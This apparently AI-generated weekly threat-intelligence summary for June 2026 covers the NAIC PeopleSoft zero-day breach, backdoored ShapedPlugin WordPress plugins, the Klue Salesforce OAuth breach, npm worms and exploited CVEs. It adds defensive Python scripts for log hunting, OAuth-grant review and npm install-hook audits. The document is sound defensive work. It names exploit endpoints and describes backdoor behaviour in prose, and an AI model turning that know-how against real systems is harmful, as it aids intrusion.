# CTI Weekly Summary — 2026-W26 (Jun 22 – Jun 28, 2026)

> **AI-generated content — no human review.** This weekly summary was produced autonomously by an LLM (Anthropic Claude; the specific model was withheld from this run's self-identification context) with parallel research and verification by sub-agents (Claude Sonnet 4.6 and a second Anthropic Claude model whose specific identity was withheld from this run's self-identification context) executing the prompt at `prompts/weekly-summary.md` as a Claude Code routine on Anthropic-managed cloud infrastructure. No human reviewed or edited this output before publication. All facts are linked inline to public sources or to the underlying daily briefs in this repository. Verify any operationally critical claim against the linked primary source before acting.

**Generated by:** Anthropic Claude (specific model not determined) · **Sub-agents:** W1: Claude Sonnet 4.6 · W2: Claude Sonnet 4.6 · verify: Claude Sonnet 4.6, Anthropic Claude (specific model not determined) · **Audience:** SOC management, IR, Threat Hunting · **Classification:** TLP:CLEAR · **Language:** English · **Prompt:** v2.64

## 0. Week at a glance

- **NAIC breached through an Oracle PeopleSoft zero-day (CVE-2026-35273); ShinyHunters dumps 3.1 TB and US rating-agency feeds stall** — the same UNC6240 campaign GTIG has tracked against ~100 orgs (68% higher education) is still acquiring victims; treat internet-reachable PeopleSoft as assume-compromise. ([daily 06-28](briefs/2026-06-28.md), [NAIC](https://content.naic.org/about/security-update))
- **FortiBleed escalates from credential exposure to confirmed AD domain takeover at a NATO-aligned defence contractor** — patch level is irrelevant; rotate any FortiGate credential active May–June and hunt AD persistence. ([daily 06-24](briefs/2026-06-24.md), [CISA](https://www.cisa.gov/news-events/alerts/2026/06/18/cisa-urges-hardening-fortinet-devices-after-reports-of-credential-exposure))
- **ShapedPlugin's official WordPress update channel shipped backdoored Pro plugins** — credential, 2FA-secret and web-shell theft straight from the trusted pipeline. ([daily 06-23](briefs/2026-06-23.md), [Wordfence](https://www.wordfence.com/blog/2026/06/psa-supply-chain-compromise-targets-shapedplugin-backdoored-pro-plugins-distributed-via-official-channels/))
- **The Klue/Icarus Salesforce OAuth breach widened to ~24 named firms, then the attacker was itself hacked and a second extortion group emerged listing ~195 organisations** — one dormant integration token cascading into multi-tenant CRM theft. ([daily 06-27](briefs/2026-06-27.md), [SecurityWeek](https://www.securityweek.com/more-klue-breach-victims-identified-as-hackers-get-hacked/))
- **The Gentlemen ransomware makes Switzerland the second-most-targeted European country, claims 478 victims and adds worm propagation** — ESET's leaked-data deep-dive shows victims are chosen on FortiGate misconfiguration, tying the pipeline to FortiBleed reconnaissance. ([daily 06-27](briefs/2026-06-27.md), [inside-it.ch](https://www.inside-it.ch/aufstrebende-ransomware-bande-findet-mehr-schweizer-opfer-20260626))
- **The week's research converges on the trust chain, not the perimeter** — a "Developer Credential Economy" feeding npm worms into AI-coding-agent session hooks, OAuth-grant abuse, and a Browser-in-the-Middle PhaaS (Bluekit) that defeats Device Bound Session Credentials. ([daily 06-28](briefs/2026-06-28.md), [Tenable](https://www.tenable.com/blog/what-the-miasma-campaign-reveals-about-the-new-supply-chain-threat-model-and-the-underground))
- **Turla's new STOCKSTAY backdoor (GTIG) broadens Russia-nexus espionage toward Western-European foreign-policy targets** — delivered via WinRAR CVE-2025-8088 and malicious RDP files; relevant to Swiss/EU governmental entities with Ukraine-adjacent policy work. ([daily 06-26](briefs/2026-06-26.md), [Google GTIG](https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering))
- **Policy: the Netherlands' NIS2 law cleared its lower house (entry into force targeted for 1 July); the EU CRA reporting obligation is ~75 days out (11 September)** — enforceable Dutch notification clocks are imminent and CRA SRP onboarding should start. ([NL Digital Government](https://www.nldigitalgovernment.nl/nis2-directive-cyberbeveiligingswet-cbw/), [ENISA SRP](https://www.enisa.europa.eu/topics/product-security-and-certification/single-reporting-platform-srp))

## 1. Highest-impact events — what's on fire if no one acted

Two genuinely new escalations this week meet the inaction-equals-incident bar; the week's other on-fire items (FortiBleed, The Gentlemen, the Klue/Icarus cascade) were already consolidated in 2026-W25 and are carried forward as status updates in §§ 2 and 8.

### NAIC breached through an Oracle PeopleSoft zero-day; ShinyHunters dumps 3.1 TB and US rating-agency feeds stall

**If you did nothing this week:** any internet-reachable Oracle PeopleSoft instance is a live pre-auth foothold — the same zero-day path that put the US National Association of Insurance Commissioners into ShinyHunters' hands, and PeopleSoft is widely deployed across European public administration, higher education and HR/finance back offices. The W25 looking-ahead flagged that ShinyHunters PeopleSoft notifications were still landing and that EU universities were a probable next-named class; NAIC is the fresh high-profile confirmation that the campaign is still acquiring victims.

NAIC — the standard-setting body for all 50 US state insurance regulators — [confirmed on 2026-06-26](https://content.naic.org/about/security-update) that an unauthorised party reached its environment on June 11 via an Oracle PeopleSoft vulnerability, then pivoted from PeopleSoft to temporary access to data-storage areas. ShinyHunters claims 3.1 TB exfiltrated ([TechRadar](https://www.techradar.com/pro/security/naic-confirms-data-breach-with-shinyhunters-claiming-3-1tb-of-data-stolen-in-oracle-zero-day-attack), [Insurance Journal](https://www.insurancejournal.com/news/national/2026/06/25/875334.htm)). The operational tell is the downstream impact NAIC itself disclosed: credit-rating agencies paused their data feeds and NAIC suspended assigning designations to insurer investments — a regulatory-process outage, not just a data-confidentiality event. This is the same PeopleSoft exploitation wave (CVE-2026-35273, the unauthenticated RCE in PeopleTools Environment Management) Google GTIG attributes to UNC6240/ShinyHunters and has been tracking against the education sector — 68% of identified targets were higher-education institutions; see § 8 for the campaign-level status. Treat any externally-reachable PeopleSoft portal (`/PSEMHUB/`, `/PSIGW/HttpListeningConnector`) as a hunt target, not a patch-later item. ([daily 06-28](briefs/2026-06-28.md))

— *Source: [NAIC security update](https://content.naic.org/about/security-update) · [Insurance Journal](https://www.insurancejournal.com/news/national/2026/06/25/875334.htm) · [TechRadar](https://www.techradar.com/pro/security/naic-confirms-data-breach-with-shinyhunters-claiming-3-1tb-of-data-stolen-in-oracle-zero-day-attack) · [Daily brief 06-28](briefs/2026-06-28.md) · Tags: data-breach, zero-day, actively-exploited, organized-crime · Region: us, europe · Sector: finance, public-sector · CVE: CVE-2026-35273 · CVSS: 9.8 · Vector: zero-click · Auth: pre-auth · Status: exploited · Evidence: "Unauthorized access to a portion of the NAIC's environment was identified on June 11 via an Oracle PeopleSoft vulnerability. While in PeopleSoft, the unauthorized party was able to obtain information needed to gain temporary access to certain data storage areas." (NAIC); "Due to the incident, certain credit rating agencies have paused their data feeds and consequently, the NAIC has temporarily suspended assigning designations to insurer investments." (NAIC)*
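The hunt the paragraph above calls for can start in web-server access logs. The script below is an added example (not NAIC's, GTIG's or this summary's own code): it parses Combined Log Format lines, keeps only requests to the two PeopleSoft paths named above, drops sources inside the organisation's own address ranges, and escalates any external source whose POST to the listening connector was answered with a 2xx. The log lines and the internal CIDR ranges are constructed placeholders; the paths are the ones the brief names.

```python
"""Hunt web-server access logs for requests to the PeopleSoft endpoints named
in the brief. Added example, not part of the original summary; the log lines
are constructed and the internal CIDR ranges are placeholders."""
import ipaddress
import re
from collections import defaultdict

# Endpoints the brief names as hunt targets for CVE-2026-35273. Prefix match,
# because the listening connector is called with path suffixes and query strings.
PEOPLESOFT_PATHS = ("/PSEMHUB/", "/PSIGW/HttpListeningConnector")

# Assumption: the organisation's own ranges. Replace with yours.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]

# Combined Log Format (Apache/nginx default); only the fields we need are captured.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Constructed sample: an internal admin using the hub, an external source
# touching both endpoints with one accepted POST, and an unrelated portal hit.
SAMPLE_LOG = """\
10.1.4.22 - - [27/Jun/2026:08:12:01 +0200] "GET /PSEMHUB/hub HTTP/1.1" 200 5120
203.0.113.45 - - [27/Jun/2026:03:41:09 +0200] "GET /PSEMHUB/ HTTP/1.1" 200 812
203.0.113.45 - - [27/Jun/2026:03:41:12 +0200] "POST /PSIGW/HttpListeningConnector HTTP/1.1" 200 233
198.51.100.7 - - [27/Jun/2026:03:55:40 +0200] "GET /psp/ps/EMPLOYEE/HRMS/h/?tab=DEFAULT HTTP/1.1" 302 0
203.0.113.45 - - [27/Jun/2026:03:41:30 +0200] "POST /PSIGW/HttpListeningConnector HTTP/1.1" 500 0
"""


def is_internal(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line: str):
    m = CLF.match(line)
    return m.groupdict() if m else None


def hunt(log_text: str) -> dict:
    """Return {source_ip: summary} for external sources that reached the
    PeopleSoft endpoints. A 2xx answer to a POST on the listening connector is
    the highest-signal event, so it is counted separately."""
    hits = defaultdict(lambda: {"requests": 0, "accepted_posts": 0, "paths": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if not path.startswith(PEOPLESOFT_PATHS):
            continue
        if is_internal(rec["ip"]):
            continue  # internal admin traffic is expected here; external is not
        entry = hits[rec["ip"]]
        entry["requests"] += 1
        entry["paths"].add(path)
        if rec["method"] == "POST" and rec["status"].startswith("2"):
            entry["accepted_posts"] += 1
    return dict(hits)


if __name__ == "__main__":
    for ip, s in hunt(SAMPLE_LOG).items():
        flag = "ESCALATE" if s["accepted_posts"] else "review"
        print(f"{flag:8} {ip} requests={s['requests']} "
              f"accepted_posts={s['accepted_posts']} paths={sorted(s['paths'])}")
```

Run it against the reverse proxy or load balancer logs in front of the portal rather than the PeopleSoft host itself, since a successful intrusion may already have touched local logs; and keep internal ranges in the filter only if internal clients genuinely cannot be attacker-controlled.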

### ShapedPlugin's official update channel shipped backdoored WordPress Pro plugins — credential, 2FA-secret and web-shell theft

**If you did nothing this week:** any site running the ShapedPlugin Pro plugins that auto-updated through the licensed channel pulled backdoor code straight from the vendor — patch level was no defence, because the trusted distribution pipeline itself was the attacker. The malicious `LicenseLoader.php` loads inside the WordPress admin panel, fetches a second stage, installs it as a fake plugin and self-deletes to frustrate forensics.

Wordfence [disclosed on 2026-06-22](https://www.wordfence.com/blog/2026/06/psa-supply-chain-compromise-targets-shapedplugin-backdoored-pro-plugins-distributed-via-official-channels/) that an attacker breached ShapedPlugin's build and Easy Digital Downloads distribution pipeline and injected backdoor code into the Pro (paid) releases of three plugins, served through official update channels. The implant harvests credentials and 2FA secrets and drops a web shell ([BleepingComputer](https://www.bleepingcomputer.com/news/security/shapedplugin-update-flow-hacked-to-infect-wordpress-sites/)). For a public-sector or education estate that runs WordPress behind a CMS team, the hunt is for the fake-plugin artefact and unexpected `LicenseLoader.php` execution in the admin context, plus credential/2FA rotation for any admin who logged in during the exposure window — not merely "update the plugin." ([daily 06-23](briefs/2026-06-23.md))

— *Source: [Wordfence](https://www.wordfence.com/blog/2026/06/psa-supply-chain-compromise-targets-shapedplugin-backdoored-pro-plugins-distributed-via-official-channels/) · [BleepingComputer](https://www.bleepingcomputer.com/news/security/shapedplugin-update-flow-hacked-to-infect-wordpress-sites/) · [Daily brief 06-23](briefs/2026-06-23.md) · Tags: supply-chain, data-breach, actively-exploited, patch-available · Region: global, europe · Sector: technology, public-sector · CVE: CVE-2026-10735 · CVSS: 9.8 · Vector: user-interaction · Auth: pre-auth · Status: exploited, patch-available · Evidence: "Attackers compromised the vendor's build and distribution pipeline, injecting backdoor code into Pro plugin releases distributed through official licensed update channels" (Wordfence); "The malicious packages contained a file named LicenseLoader.php, which was loaded automatically within the WordPress admin panel ... downloaded a second-stage payload, installed it as a fake plugin ... and then deleted itself to hinder forensic analysis" (BleepingComputer)*

## 2. Multi-day campaigns and chains

### Klue / Icarus Salesforce OAuth-integration breach — from nine named victims to ~24, then the attacker gets hacked

This is the W25 multi-day item, but the in-window deltas re-shape it materially. At the start of the week the named-victim list stood at nine, mostly cybersecurity vendors (HackerOne, Huntress, Jamf, OneTrust and others, [SecurityWeek 06-23](https://www.securityweek.com/more-cybersecurity-firms-disclose-impact-from-klue-hack/)). It then accreted through the week: 8x8 [filed an SEC 8-K Item 1.05 on 06-23](https://www.sec.gov/Archives/edgar/data/0001023731/000102373126000084/eght-20260617.htm) confirming Salesforce exfiltration; [BeyondTrust and LastPass disclosed](https://www.securityweek.com/beyondtrust-lastpass-impacted-by-klue-salesforce-incident/) business-contact and sales data theft on 06-25; by 06-27 [roughly two dozen firms](https://www.securityweek.com/more-klue-breach-victims-identified-as-hackers-get-hacked/) had notified, and in a twist the Icarus attacker was itself hacked, with a second extortion actor now threatening the stolen data. Salesforce disabled the Klue connected app.

The new lens the dailies could not assemble: this is a single dormant OAuth integration credential at one SaaS vendor cascading into multi-tenant CRM theft across that vendor's entire customer base — the exact failure mode ReliaQuest framed as "integration abused in CRM data theft" in W25. For a Swiss/EU SOC the takeaway is an OAuth-grant inventory exercise: enumerate third-party connected apps with API scopes into your CRM/identity tenants, revoke dormant grants, and alert on bulk REST/Bulk-API reads from integration principals — patching helps nothing here, because no software was vulnerable; a delegated token was. ([daily 06-23](briefs/2026-06-23.md), [daily 06-25](briefs/2026-06-25.md), [daily 06-27](briefs/2026-06-27.md))

— *Source: [SecurityWeek — victims identified, hackers hacked](https://www.securityweek.com/more-klue-breach-victims-identified-as-hackers-get-hacked/) · [SEC EDGAR — 8x8 Form 8-K](https://www.sec.gov/Archives/edgar/data/0001023731/000102373126000084/eght-20260617.htm) · [SecurityWeek — BeyondTrust/LastPass](https://www.securityweek.com/beyondtrust-lastpass-impacted-by-klue-salesforce-incident/) · [Daily brief 06-23](briefs/2026-06-23.md) · Tags: data-breach, supply-chain, identity, cloud, organized-crime · Region: global, europe · Sector: technology, finance*
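The grant-inventory exercise described above, as an added example that is not Klue's, Salesforce's or this summary's own code. It works on two exports a tenant administrator can usually produce (a connected-app grant list with last-use timestamps, and an API usage event log), flags grants that have been unused longer than a policy threshold, and raises an alert when an integration principal reads more rows per hour than a baseline allows, tagging the alert when that principal belongs to a dormant grant. All records, thresholds and field names are constructed assumptions; map them from your tenant's real exports.

```python
"""Inventory third-party OAuth grants into a CRM tenant and flag the two
signals this section asks for: dormant integration grants, and bulk API reads
by an integration principal. Added example; not Klue's, Salesforce's or the
brief's own code. All records are constructed and the field names are
assumptions: map them from your tenant's connected-app and API-event exports."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

DORMANT_AFTER = timedelta(days=90)              # assumption: policy threshold
BULK_ROWS_PER_HOUR = 50_000                     # assumption: tune to your baseline
DATA_SCOPES = {"api", "full", "refresh_token"}  # scopes that reach CRM records


def utc(s: str) -> datetime:
    return datetime.fromisoformat(s).replace(tzinfo=timezone.utc)


# The grant inventory is a snapshot taken at the start of the review window;
# every API event below post-dates it.
SNAPSHOT = utc("2026-06-25T00:00:00")


@dataclass
class Grant:
    app: str
    principal: str        # integration user the token acts as
    scopes: set
    last_used: datetime


@dataclass
class ApiEvent:
    ts: datetime
    principal: str
    api: str              # "rest", "bulk", "soap"
    rows: int


# Constructed inventory: one live integration, one dormant grant that still
# holds data scopes, one dormant grant with no record access.
GRANTS = [
    Grant("TicketingSync", "svc-ticketing", {"api", "refresh_token"}, utc("2026-06-24T22:10:00")),
    Grant("LegacyIntelConnector", "svc-intel", {"api", "full", "refresh_token"}, utc("2025-11-02T09:00:00")),
    Grant("CalendarWidget", "svc-calendar", {"openid", "profile"}, utc("2025-09-15T09:00:00")),
]

# Constructed API events: routine traffic, then the dormant principal pulling
# hundreds of thousands of rows through the Bulk API overnight.
EVENTS = [
    ApiEvent(utc("2026-06-26T10:00:00"), "svc-ticketing", "rest", 1_200),
    ApiEvent(utc("2026-06-26T10:30:00"), "svc-ticketing", "rest", 900),
    ApiEvent(utc("2026-06-26T02:05:00"), "svc-intel", "bulk", 180_000),
    ApiEvent(utc("2026-06-26T02:40:00"), "svc-intel", "bulk", 210_000),
]


def dormant_grants(grants, now=SNAPSHOT):
    """(app, holds_data_scope) for every grant unused longer than DORMANT_AFTER.
    Data-scoped ones are the revoke-now set; the rest are clean-up."""
    return [(g.app, bool(g.scopes & DATA_SCOPES))
            for g in grants if now - g.last_used > DORMANT_AFTER]


def bulk_read_alerts(events, grants, threshold=BULK_ROWS_PER_HOUR):
    """Sum rows read per integration principal per clock hour and alert above
    the threshold. A dormant grant that suddenly reads in bulk is tagged,
    because that is the Klue/Icarus shape."""
    dormant = {g.principal for g in grants if SNAPSHOT - g.last_used > DORMANT_AFTER}
    per_hour = defaultdict(int)
    for e in events:
        per_hour[(e.principal, e.ts.replace(minute=0, second=0, microsecond=0))] += e.rows
    alerts = []
    for (principal, hour), rows in sorted(per_hour.items()):
        if rows > threshold:
            alerts.append({"principal": principal, "hour": hour.isoformat(),
                           "rows": rows, "dormant_grant": principal in dormant})
    return alerts


if __name__ == "__main__":
    for app, data in dormant_grants(GRANTS):
        print(f"{'REVOKE ' if data else 'cleanup'} {app}")
    for a in bulk_read_alerts(EVENTS, GRANTS):
        print("ALERT", a)
```

The two checks deliberately stay separate: the dormancy list is a periodic hygiene job that produces a revocation queue, while the bulk-read alert is a streaming detection that should fire even for grants that were active yesterday, since a live integration token stolen from the vendor looks identical to the vendor's own traffic until the volume changes.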

### ShinyHunters (UNC6240) — one cluster, multiple reported tradecraft paths in one week

The week is a compact case study in how a single extortion cluster's *reported* activity spans very different initial-access tradecraft. The two firmly UNC6240-attributed events are the Oracle PeopleSoft zero-day behind the NAIC breach (GTIG/Mandiant attribution, § 1) and the April 2026 Instructure Canvas LMS breach, whose UK Cyber Monitoring Centre [sector review](https://www.computerweekly.com/news/366645159/Canvas-breach-hit-160-UK-unis-but-caused-limited-damage) landed 06-27 (160 UK universities, extortion, ransom paid). Alongside them, [404 Media's reconstruction](https://www.404media.co/how-hackers-broke-into-madison-square-garden/) (06-26) showed the Madison Square Garden intrusion began with a single vishing call into the company's identity platform — the operator phoned a low-level employee and talked them through authorising access; the 404 Media account documents the technique but names no actor, and the ShinyHunters link rests on the operators' own claims and the SSO-vishing TTP overlap [Abnormal Security](https://abnormal.ai/blog/shinyhunters-sso-social-engineering-mfa-identity-compromise) attributes to the cluster.

The cross-day pattern matters more than any single victim: a server-side zero-day, a SaaS-platform compromise and SSO-targeting vishing all appear under (or adjacent to) one extortion banner in one week, so defending against this cluster is not a single control. It is externally-reachable enterprise-app patching/hunting, third-party SaaS exposure management, and help-desk/identity-platform vishing resistance (callback verification, no MFA-reset-on-call) — all at once. ([daily 06-26](briefs/2026-06-26.md), [daily 06-27](briefs/2026-06-27.md), [daily 06-28](briefs/2026-06-28.md))

— *Source: [Computer Weekly — Canvas/CMC review](https://www.computerweekly.com/news/366645159/Canvas-breach-hit-160-UK-unis-but-caused-limited-damage) · [404 Media — MSG vishing](https://www.404media.co/how-hackers-broke-into-madison-square-garden/) · [Abnormal Security — ShinyHunters SSO vishing TTP](https://abnormal.ai/blog/shinyhunters-sso-social-engineering-mfa-identity-compromise) · [Daily brief 06-26](briefs/2026-06-26.md) · Tags: organized-crime, data-breach, identity, phishing · Region: uk, us, europe · Sector: education, media, public-sector*

### npm supply-chain worms — a sustained wave across the week

Three separate npm-ecosystem supply-chain events were in play across the window, and the pattern is the story. Microsoft attributed the [Mastra scope compromise](https://www.bleepingcomputer.com/news/security/microsoft-links-mastra-ai-supply-chain-attack-to-north-korean-hackers/) (140+ `@mastra` packages, `postinstall` dropper) to North Korea's Sapphire Sleet (covered in the daily on 06-21). JFrog documented [PostCSS typosquats](https://research.jfrog.com/post/from-postcss-typosquat-to-windows-rat/) from the `abdrizak` account delivering a Nuitka-compiled Python RAT with Chrome DPAPI credential theft. And on 2026-06-25 Socket reported a [fresh Miasma / "Mini Shai-Hulud" worm wave](https://socket.dev/blog/miasma-mini-shai-hulud-hits-leoplatform-npm-packages-go-ecosystem) across LeoPlatform/RStreams packages (carried in the daily 06-27), the self-propagating supply-chain worm last seen backdooring `@redhat-cloud-services`.

The synthesis: the npm registry is under continuous, parallel pressure from a state actor (DPRK), commodity typosquat crews and a self-replicating worm — three different operators, one ecosystem. The common control is the same one npm v12 is about to enforce by default: disable install scripts (`--ignore-scripts`), pin and review dependencies, and treat CI build-time package resolution as an attack surface. ([daily 06-21](briefs/2026-06-21.md), [daily 06-24](briefs/2026-06-24.md), [daily 06-27](briefs/2026-06-27.md))

— *Source: [Socket Security — Miasma](https://socket.dev/blog/miasma-mini-shai-hulud-hits-leoplatform-npm-packages-go-ecosystem) · [JFrog — PostCSS RAT](https://research.jfrog.com/post/from-postcss-typosquat-to-windows-rat/) · [Microsoft — Mastra](https://www.microsoft.com/en-us/security/blog/2026/06/17/postinstall-payload-inside-mastra-npm-supply-chain-compromise/) · [Daily brief 06-27](briefs/2026-06-27.md) · Tags: supply-chain, infostealer, north-korea-nexus, organized-crime · Region: global · Sector: technology*
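Before a team can turn on `--ignore-scripts` it needs to know which of its dependencies actually rely on an install hook. The script below is an added example (not Socket's, JFrog's, Microsoft's or this summary's code): it walks a `node_modules` tree, including scoped and nested transitive packages, and lists every `preinstall`, `install` and `postinstall` hook that is not on a reviewed allow list. The sample tree is constructed in a temporary directory and the package names in it are invented; point `scan_tree()` at a real tree to use it.

```python
"""Audit an installed node_modules tree for packages that declare install-time
lifecycle scripts, the hook the events in this section abused. Added example,
not from Socket, JFrog, Microsoft or the brief. The sample tree is constructed
in a temporary directory with invented package names."""
import json
import os
import tempfile
from pathlib import Path

# npm runs these automatically during install unless --ignore-scripts is set.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Assumption: packages a team has reviewed and decided genuinely need a hook.
ALLOWED = {"node-gyp-build-example": {"install"}}


def package_manifests(node_modules: Path):
    """Yield every package.json under node_modules, including @scope/name
    packages and the nested node_modules of transitive dependencies."""
    for root, _dirs, files in os.walk(node_modules):
        if "package.json" in files:
            yield Path(root) / "package.json"


def scan_tree(node_modules: Path):
    """Return (package, hook, command) for every install hook that is not on
    the reviewed allow list."""
    findings = []
    for pj in package_manifests(node_modules):
        try:
            meta = json.loads(pj.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: no hook npm could run
        name = meta.get("name", str(pj.parent))
        scripts = meta.get("scripts") or {}
        for hook in INSTALL_HOOKS:
            if hook in scripts and hook not in ALLOWED.get(name, set()):
                findings.append((name, hook, scripts[hook]))
    return findings


def build_sample_tree(base: Path) -> Path:
    """Constructed node_modules: a clean package, an allow-listed native build,
    a scoped package with a postinstall hook, and a nested transitive
    dependency with a preinstall hook."""
    nm = base / "node_modules"
    layout = {
        "left-pad-example/package.json":
            {"name": "left-pad-example", "version": "1.0.0"},
        "node-gyp-build-example/package.json":
            {"name": "node-gyp-build-example", "scripts": {"install": "node-gyp rebuild"}},
        "@scope-example/agent/package.json":
            {"name": "@scope-example/agent", "scripts": {"postinstall": "node setup.js"}},
        "left-pad-example/node_modules/tiny-dep-example/package.json":
            {"name": "tiny-dep-example", "scripts": {"preinstall": "node pre.js", "test": "jest"}},
    }
    for rel, meta in layout.items():
        p = nm / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(json.dumps(meta), encoding="utf-8")
    return nm


def demo():
    """Build the constructed tree and return the sorted findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return sorted(scan_tree(build_sample_tree(Path(tmp))))


if __name__ == "__main__":
    for name, hook, cmd in demo():
        print(f"{name}: {hook} -> {cmd!r}")
```

Once the list is short and reviewed, `ignore-scripts=true` in the project's `.npmrc` (or `npm ci --ignore-scripts` in CI) makes the default safe, and the allow-listed packages can be built in an explicit, audited step.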

## 3. Vulnerability roll-up

Operationally critical CVEs of the week, by exploitation status. Each entry states its status this week against its status when first covered. KEV listing is treated as jurisdiction-agnostic exploitation confirmation; KEV *deadlines* are US-FCEB compliance dates and carry no operational weight here.

### CVE-2026-12569 — PTC Windchill / FlexPLM: pre-auth deserialization RCE, now confirmed exploited with JSP web shells (CISA KEV)

When first covered (06-20) and in the W25 weekly this was a pre-auth deserialization flaw with BSI escalating to admins out-of-hours. The in-window delta: CISA [added it to KEV on 06-25](https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html) and JSP web-shell deployment against the login interface is now confirmed in the wild. Any internet-reachable Windchill PDMLink or FlexPLM instance should be treated as assume-compromise — manufacturing and defence-supplier PLM is exactly the externally-reachable engineering surface a Swiss/EU industrial estate forgets to inventory.

— *Source: [The Hacker News](https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html) · [ENISA EUVD EUVD-2026-37831](https://euvd.enisa.europa.eu/enisa/eu_vulnerability_database/EUVD-2026-37831) · [Daily brief 06-27](briefs/2026-06-27.md) · Tags: vulnerabilities, actively-exploited, rce, pre-auth, cisa-kev · Region: global, europe · Sector: manufacturing, defense · CVE: CVE-2026-12569 · CVSS: 9.3 · Vector: zero-click · Auth: pre-auth · Status: exploited, cisa-kev, patch-available*

### CVE-2026-20245 — Cisco Catalyst SD-WAN Manager: Mandiant reconstructs the full zero-day chain

Mandiant (GTIG) [published the first complete TTP chain](https://cloud.google.com/blog/topics/threat-intelligence/zero-day-exploitation-cisco-catalyst-sd-wan-manager) on 06-24 for the Catalyst SD-WAN Manager zero-day activity, observed at a service provider: a peering/authentication bypass (CVE-2026-20127, CVE-2026-20182) leading to credential manipulation, then local privilege escalation to root via a malicious CSV upload (CVE-2026-20245) to plant a root backdoor. NCSC-CH [posted on it](https://security-hub.ncsc.admin.ch/#/posts/12579), giving it direct Swiss relevance. Telco and public-sector SD-WAN operators should hunt for unexpected file writes under the web-UI service account and root-owned artefacts post-dating the patch.

— *Source: [Google Mandiant (GTIG)](https://cloud.google.com/blog/topics/threat-intelligence/zero-day-exploitation-cisco-catalyst-sd-wan-manager) · [Cisco PSIRT](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx) · [Daily brief 06-27](briefs/2026-06-27.md) · Tags: vulnerabilities, actively-exploited, priv-esc, rce, patch-available · Region: global, switzerland · Sector: telco, public-sector · CVE: CVE-2026-20245 · CVSS: 7.8 · Vector: local · Auth: post-auth · Status: exploited, patch-available*

### CVE-2025-67038 — Lantronix EDS5000 serial-to-IP converters: unauthenticated command injection to root (BRIDGE:BREAK, CISA KEV)

Forescout Vedere Labs' [BRIDGE:BREAK research](https://www.forescout.com/blog/exploiting-serial-to-ethernet-converters-in-critical-infrastructure/) documented an unauthenticated OS command-injection flaw in Lantronix EDS5000-series device servers — the HTTP management interface concatenates unsanitised input into a shell call. The in-window development is its CISA KEV listing on 2026-06-23 with confirmed in-the-wild exploitation (covered in [daily 06-24](briefs/2026-06-24.md)) — the first BRIDGE:BREAK flaw to flip from research to active abuse. Serial-to-IP converters sit in front of OT, building-management and medical serial devices; firmware 2.0.0R1 closes it. This is an energy/water/healthcare exposure, not an IT one.

— *Source: [Forescout Vedere Labs — BRIDGE:BREAK](https://www.forescout.com/blog/exploiting-serial-to-ethernet-converters-in-critical-infrastructure/) · [SecurityWeek](https://www.securityweek.com/serial-to-ip-converter-flaws-expose-ot-and-healthcare-systems-to-hacking/) · [Daily brief 06-24](briefs/2026-06-24.md) · Tags: vulnerabilities, actively-exploited, cisa-kev, pre-auth, rce, ot-ics, patch-available · Region: global, europe · Sector: energy, manufacturing, water · CVE: CVE-2025-67038 · CVSS: 9.8 · Vector: zero-click · Auth: pre-auth · Status: exploited, cisa-kev, patch-available*

### CVE-2026-34908 / CVE-2026-34909 / CVE-2026-34910 — Ubiquiti UniFi OS Server: pre-auth RCE chain, exploited (CISA KEV)

Three max-severity (CVSS 10.0) flaws in UniFi OS Server — improper access control and path traversal that bypass authentication and reach an unauthenticated RCE endpoint — were [patched and KEV-listed](https://www.bleepingcomputer.com/news/security/ubiquiti-patches-three-max-severity-unifi-os-vulnerabilities/) with confirmed exploitation. UniFi controllers are common in DACH SME, education and public-sector branch networks; the management plane is frequently exposed. Patch and audit controller-account integrity.

— *Source: [BleepingComputer](https://www.bleepingcomputer.com/news/security/ubiquiti-patches-three-max-severity-unifi-os-vulnerabilities/) · [SC Media](https://www.scworld.com/brief/ubiquiti-unifi-os-server-vulnerabilities-allow-unauthenticated-remote-code-execution) · [Daily brief 06-24](briefs/2026-06-24.md) · Tags: vulnerabilities, actively-exploited, cisa-kev, pre-auth, rce, auth-bypass, patch-available · Region: global, europe, dach · Sector: public-sector, healthcare, education · CVE: CVE-2026-34908, CVE-2026-34909, CVE-2026-34910 · CVSS: 10.0 / 10.0 / 10.0 · Vector: zero-click · Auth: pre-auth · Status: exploited, cisa-kev, patch-available*

### CVE-2026-20230 — Cisco Unified CM WebDialer: pre-auth SSRF to arbitrary root file write, reconnaissance-stage scanning observed

Cisco PSIRT's advisory describes an SSRF in the WebDialer service of Unified CM 14/15 that lets an unauthenticated attacker write files to the OS and later escalate to root. The in-window signal: [exploitation moved to reconnaissance stage](https://www.bleepingcomputer.com/news/security/cisco-unified-cm-sme-flaw-cve-2026-20230-now-exploited-in-attacks/), with a PoC that fingerprints vulnerable devices. Unified CM is core telephony for many cantonal and hospital networks — patch before the scanning becomes exploitation.

— *Source: [Cisco PSIRT advisory cisco-sa-cucm-ssrf-cXPnHcW](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssrf-cXPnHcW) · [BleepingComputer](https://www.bleepingcomputer.com/news/security/cisco-unified-cm-sme-flaw-cve-2026-20230-now-exploited-in-attacks/) · [Daily brief 06-24](briefs/2026-06-24.md) · Tags: vulnerabilities, actively-exploited, pre-auth, poc-public, patch-available, rce · Region: global · Sector: technology · CVE: CVE-2026-20230 · CVSS: 8.6 · Vector: zero-click · Auth: pre-auth · Status: exploited, poc-public, patch-available*

